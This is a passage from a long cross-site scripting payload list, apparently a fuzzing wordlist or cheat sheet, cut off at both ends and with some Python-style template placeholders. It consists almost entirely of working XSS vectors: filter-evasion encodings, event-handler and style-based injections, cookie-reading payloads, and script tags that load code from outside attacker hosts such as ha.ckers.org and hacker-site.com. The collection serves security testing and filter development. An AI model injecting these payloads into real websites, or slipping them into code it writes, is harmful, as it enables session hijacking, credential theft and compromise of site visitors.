CONTENT="0;url=javascript:javascript:alert(1);"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> <IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> <TABLE BACKGROUND="javascript:javascript:alert(1)"> <TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> <DIV STYLE="background-image: url(javascript:javascript:alert(1))"> <DIV STYLE="width:expression(javascript:alert(1));"> <IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> <XSS STYLE="xss:expression(javascript:alert(1))"> <STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> <STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> <!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> <BASE HREF="javascript:javascript:alert(1);//"> <OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> <HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML> <SCRIPT SRC="%(jpg)s"></SCRIPT> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- <form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X <body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> <STYLE>@import'%(css)s';</STYLE> <STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> <SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> <style onreadystatechange=javascript:javascript:alert(1);></style> <?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> <embed code=%(scriptlet)s></embed> <embed code=javascript:javascript:alert(1);></embed> <embed src=%(jscript)s></embed> <frameset onload=javascript:javascript:alert(1)></frameset> <object onerror=javascript:javascript:alert(1)> <embed type="image" src=%(scriptlet)s></embed> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml> <IMG SRC=&{javascript:alert(1);};> <a href="javAascript:javascript:alert(1)">test1</a> <a href="javaascript:javascript:alert(1)">test1</a> <embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> <iframe srcdoc="<iframe/srcdoc=<img/src=''onerror=javascript:alert(1)>>"> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!--"<XSS>=&{()} <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <a onmouseover="alert(document.cookie)">xxs link</a> <a onmouseover=alert(document.cookie)>xxs link</a> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=# onmouseover="alert('xxs')"> <IMG SRC= onmouseover="alert('xxs')"> <IMG onmouseover="alert('xxs')"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out <IMG SRC="  javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js?< B > <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');// </TITLE><SCRIPT>alert("XSS");</SCRIPT> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> <IMG SRC='vbscript:msgbox("XSS")'> <IMG SRC="livescript:[code]"> <BODY ONLOAD=alert('XSS')> <BGSOUND SRC="javascript:alert('XSS');"> <BR SIZE="&{alert('XSS')}"> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <XSS STYLE="xss:expression(alert('XSS'))"> <XSS STYLE="behavior: url(xss.htc);"> ºscriptæalert(¢XSS¢)º/scriptæ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE BACKGROUND="javascript:alert('XSS')"> <TABLE><TD BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <BASE HREF="javascript:alert('XSS');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="htt p://6 6.000146.0x7.147/">XSS</A> <iframe src="	javascript:prompt(1)	"> <svg><style>{font-family:'<iframe/onload=confirm(1)>' <input/onmouseover="javaSCRIPT:confirm(1)" <sVg><scRipt >alert(1) {Opera} <img/src=`` onerror=this.onerror=confirm(1) <form><isindex formaction="javascript:confirm(1)" <img src=``
 onerror=alert(1)
 <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /**/>/**/alert(1)/**/</script /**/ "><h1/onmouseover='\u0061lert(1)'> <iframe/src="data:text/html,<svg onload=alert(1)>"> <meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/> <svg><script xlink:href=data:,window.open('https://www.google.com/')></script <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> <iframe src=javascript:alert(document.location)> <form><a href="javascript:\u0061lert(1)">X </script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'> <img/  src=`~` onerror=prompt(1)> <form><iframe  src="javascript:alert(1)" ;> <a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" >X</a http://www.google<script .com>alert(document.location)</script <a href=[�]"� onmouseover=prompt(1)//">XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style ><script :-(>/**/alert(document.location)/**/</script :-( �</form><input type="date" onfocus="alert(1)"> <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <iframe srcdoc='<body onload=prompt(1)>'> <a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a> <script ~~~>alert(0%0)</script ~~~> <style/onload=<!-- >alert(1)> <///style///><span %2F onmousemove='alert(1)'>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1) "><svg><style>{-o-link-source:'<body/onload=confirm(1)>' <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert(1)'>^__^ <div/style="width:expression(confirm(1))">X</div> {IE7} <iframe// src=javaSCRIPT:alert(1) //<form/action=javascript:alert(document.cookie)><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> <a/href="javascript: javascript:prompt(1)"><input type="X"> </plaintext\></|\><plaintext/onmouseover=prompt(1) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} <a href="javascript:\u0061le%72t(1)"><button> <div onmouseover='alert(1)'>DIV</div> <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> <a href="jAvAsCrIpT:alert(1)">X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <var onmouseover="prompt(1)">On Mouse Over</var> <a href=javascript:alert(document.cookie)>Click Here</a> <img src="/" =_=" title="onerror='prompt(1)'"> <%<!--'%><script>alert(1);</script --> <script src="data:text/javascript,alert(1)"></script> <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<><iframe/src=javascript:confirm(1) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div> <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> <img src=`xx:xx`onerror=alert(1)> <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> <meta http-equiv="refresh" content="0;javascript:alert(1)"/> <math><a xlink:href="//jsfiddle.net/t846h/">click <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg contentScriptType=text/vbs><script>MsgBox+1 <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script <object data=javascript:\u0061le%72t(1)> <script>+-+-1-+-+alert(1)</script> <body/onload=<!-->
alert(1)> <script itworksinallbrowsers>/*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) <svg><script>//
confirm(1);</script </svg> <svg><script onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe <script x> alert(1) </script 1=2 <div/onmouseover='alert(1)'> style="x:"> <--`<img/src=` onerror=alert(1)> --!> <script/src=data:text/javascript,alert(1)></script> <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> "><img src=x onerror=window.open('https://www.google.com/');> <form><button formaction=javascript:alert(1)>CLICKME <math><a xlink:href="//jsfiddle.net/t846h/">click <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
'';!--"<XSS>=&{()} '>//\\,<'>">">"*" '); alert('XSS <script>alert(1);</script> <script>alert('XSS');</script> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <scr<script>ipt>alert('XSS');</scr</script>ipt> <script>alert(String.fromCharCode(88,83,83))</script> <img src=foo.png onerror=alert(/xssed/) /> <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> <marquee><script>alert('XSS')</script></marquee> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"javascript:alert('XSS');\"> <IMG SRC=\"javascript:alert('XSS');\"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> "><script>alert(0)</script> <script src=http://yoursite.com/your_files.js></script> </title><script>alert(/xss/)</script> </textarea><script>alert(/xss/)</script> <IMG LOWSRC=\"javascript:alert('XSS')\"> <IMG DYNSRC=\"javascript:alert('XSS')\"> <font style='color:expression(alert(document.cookie))'> <img src="javascript:alert('XSS')"> <script language="JavaScript">alert('XSS')</script> <body onunload="javascript:alert('XSS');"> <body onLoad="alert('XSS');" [color=red' onmouseover="alert('xss')"]mouse over[/color] "/></a></><img src=1.gif onerror=alert(1)> window.alert("Bonjour !"); <div style="x:expression((window.r==1)?'':eval('r=1; alert(String.fromCharCode(88,83,83));'))"> <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe> "><script alert(String.fromCharCode(88,83,83))</script> '>><marquee><h1>XSS</h1></marquee> '">><script>alert('XSS')</script> '">><marquee><h1>XSS</h1></marquee> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"> <script>var var = 1; alert(var)</script> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <?='<SCRIPT>alert("XSS")</SCRIPT>'?> <IMG SRC='vbscript:msgbox(\"XSS\")'> " onfocus=alert(document.domain) "> <" <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET> <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out <br size=\"&{alert('XSS')}\"> <scrscriptipt>alert(1)</scrscriptipt> </br style=a:expression(alert())> </script><script>alert(1)</script> "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> [color=red width=expression(alert(123))][color] <BASE HREF="javascript:alert('XSS');//"> Execute(MsgBox(chr(88)&chr(83)&chr(83)))< "></iframe><script>alert(123)</script> <body onLoad="while(true) alert('XSS');"> '"></title><script>alert(1111)</script> </textarea>'"><script>alert(document.cookie)</script> '""><script language="JavaScript"> alert('X \nS \nS');</script> </script></script><<<<script><>>>><<<script>alert(123)</script> <html><noalert><noscript>(123)</noscript><script>(123)</script> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> '></select><script>alert(123)</script> '>"><script src = 'http://www.site.com/XSS.js'></script> }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script> <SCRIPT>document.write("XSS");</SCRIPT> a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d); ='><script>alert("xss")</script> <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script> <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body> ">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script> ">/KinG-InFeT.NeT/><script>alert(document.cookie)</script> src="http://www.site.com/XSS.js"></script> data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4= !--" /><script>alert('xss');</script> <script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> "><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee> '"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee> <img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> <script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee> "><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee> '"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee> <iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee> '><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=' "><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=" \'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\' http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS?? http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS?? '); alert('xss'); var x=' \\'); alert(\'xss\');var x=\' //--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83)); >"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt> <img src="svg SHOULD not be executed trough image tags" onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');"></img> </body> </html> <SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT> <SCRIPT> alert(ìXSSî); </SCRIPT> <BODY ONLOAD=alert("XSS")> <BODY BACKGROUND="javascript:alert('XSS')"> <IMG SRC="javascript:alert('XSS');"> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <IFRAME SRC=îhttp://hacker-site.com/xss.htmlî> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <TABLE BACKGROUND="javascript:alert('XSS')"> <TD BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html"> <EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always"> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!--"<XSS>=&{()} <SCRIPT>alert('XSS')</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <BASE HREF="javascript:alert('XSS');//"> <BGSOUND SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS');"> <BODY ONLOAD=alert('XSS')> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG DYNSRC="javascript:alert('XSS');"> <IMG LOWSRC="javascript:alert('XSS');"> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser exp/*<XSS STYLE='no\xss:noxss("*//*"); <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS <IMG SRC='vbscript:msgbox("XSS")'> <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> <IMG SRC="livescript:[code]"> %BCscript%BEalert(%A2XSS%A2)%BC/script%BE <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <IMG SRC="mocha:[code]"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")";eval(a+b+c+d); <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> <XSS STYLE="xss:expression(alert('XSS'))"> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE> <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE> <HTML xmlns:xss> <XML ID=I><X><C><![CDATA[<IMG 